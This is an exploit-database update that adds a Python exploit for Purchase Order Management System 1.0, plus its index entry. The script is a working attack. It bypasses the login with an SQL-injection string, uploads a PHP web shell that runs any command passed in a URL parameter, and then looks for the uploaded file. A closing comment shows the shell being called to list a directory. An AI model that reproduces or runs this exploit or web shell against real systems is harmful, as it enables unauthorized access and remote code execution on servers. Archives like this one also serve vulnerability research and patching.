DB: 2021-09-15

1 changes to exploits/shellcodes

Purchase Order Management System 1.0 - Remote File Upload

exploits/php/webapps/50292.py

@@ -0,0 +1,91 @@
+# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload
+# Date: 2021-09-14
+# Exploit Author: Aryan Chehreghani
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
+# Version: v1.0
+# Tested on: Windows 10 - XAMPP Server
+
+# [ About the Purchase Order Management System ] :
+#This Purchase Order Management System can store the list of all company's,
+#suppliers for easily retrieving the suppliers' data upon generating the purchase order.
+#It also stores the list of Items that the company possibly purchased from their suppliers.
+#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations.
+#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.
+
+#!/bin/env python3
+import requests
+import time
+import sys
+from colorama import Fore, Style
+if len(sys.argv) !=2:
+        print ('''
+###########################################################
+#Purchase Order Management System 1.0 - Remote File Upload#
+#                  BY:Aryan Chehreghani                   #
+#        Team:TAPESH DIGITAL SECURITY TEAM IRAN           #
+#             mail:aryanchehreghani@yahoo.com	          #
+#          -+-USE:python script.py <target url>           #
+#       [+]Example:python3 script.py http://127.0.0.1/    #
+###########################################################
+''')
+else:
+    try:
+        url = sys.argv[1]
+        print()
+        print('[*] Trying to login...')
+        time.sleep(1)
+        login = url + '/classes/Login.php?f=login'
+        payload_name = "shell.php"
+        payload_file = r"""<?php @system($_GET['tapesh']); ?>"""
+        session = requests.session()
+        post_data = {"username": "'=''or'", "password": "'=''or'"}
+        user_login = session.post(login, data=post_data)
+        cookie = session.cookies.get_dict()
+
+        if user_login.text == '{"status":"success"}':
+            print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')
+            upload_url = url + "/classes/Users.php?f=save"
+            cookies = cookie
+            headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------221231088029122460852571642112", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/leave_system/admin/?page=user"}
+            data = "-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nAdminstrator\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nAdmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\nadmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"img\"; filename=\"" + payload_name +"\"\r\nContent-Type: application/x-php\r\n\r\n\n " + payload_file + "\n\n\r\n-----------------------------221231088029122460852571642112--\r\n"
+            print('[*] Trying to shell...')
+            time.sleep(2)
+
+            try:
+                print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')
+                upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)
+                upload_check = f'{url}/uploads'
+                r = requests.get(upload_check)
+                if payload_name in r.text:
+
+                    payloads = r.text.split('<a href="')
+                    for load in payloads:
+
+                        if payload_name in load:
+                            payload = load.split('"')
+                            payload = payload[0]
+                        else:
+                            pass
+                else:
+                    exit()
+
+            except:
+                print ("Upload failed try again\n")
+                exit()
+
+            try:
+                print("Check Your Target ;)\n")
+
+
+            except:
+                print("Failed to find shell\n")
+
+        else:
+            print("Login failed!\n")
+
+    except:
+        print("Something Went Wrong!\n")
+
+#########################################################
+#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir

files_exploits.csv

@@ -44411,3 +44411,4 @@ id,file,description,date,author,type,platform,port
 50286,exploits/hardware/webapps/50286.txt,"ECOA Building Automation System - Arbitrary File Deletion",1970-01-01,Neurogenesia,webapps,hardware,
 50287,exploits/php/webapps/50287.py,"Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php,
 50288,exploits/php/webapps/50288.py,"Apartment Visitor Management System (AVMS) 1.0 - SQLi to RCE",1970-01-01,mari0x00,webapps,php,
+50292,exploits/php/webapps/50292.py,"Purchase Order Management System 1.0 - Remote File Upload",1970-01-01,"Aryan Chehreghani",webapps,php,